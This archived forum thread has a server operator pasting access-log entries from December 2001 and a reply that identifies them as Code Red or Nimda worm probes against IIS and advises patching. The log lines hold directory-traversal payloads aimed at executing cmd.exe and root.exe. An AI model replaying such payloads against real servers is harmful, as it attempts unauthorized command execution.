Jump to content

Yikes - Access Log?


Hammerton
 Share

This topic is 7243 days old. Please don't post here. Open a new topic instead.

Recommended Posts

I recently started up a new FM5 Unlimited server set-up. Over the weekend I got an enormous number of requests, all of the sort that I have pasted below. The sites that I serve are academic and should not be getting any hits. Are these robots? Hacks? Or is this what a typical visit looks like on the access log. I previously used FM4.1 and it either didn't have this feature or I was too stupid to use it. I have limited IP access to my subnet so I don't think any damage was done in any event.

203.73.193.54 - - [15/Dec/2001:07:51:52 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1372

203.73.193.54 - - [15/Dec/2001:07:52:16 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1368

203.73.193.54 - - [15/Dec/2001:07:52:18 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388

203.73.193.54 - - [15/Dec/2001:07:52:20 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388

203.73.193.54 - - [15/Dec/2001:07:52:31 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1416

203.73.193.54 - - [15/Dec/2001:07:52:32 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1450

203.73.193.54 - - [15/Dec/2001:07:52:37 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1450

203.73.193.54 - - [15/Dec/2001:07:54:12 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424

203.73.193.54 - - [15/Dec/2001:07:54:14 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424

Link to comment
Share on other sites

Those hits are from an internet worm. Either "Code Red" or "Nimda". If you are running IIS, make sure you have installed all the Microsoft Code Red patches. The hits are comming from other unpatched and infected IIS servers. Other than installing the patches there is not much you can do to prevent this.

Good luck,

Martin

Link to comment
Share on other sites

This topic is 7243 days old. Please don't post here. Open a new topic instead.

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.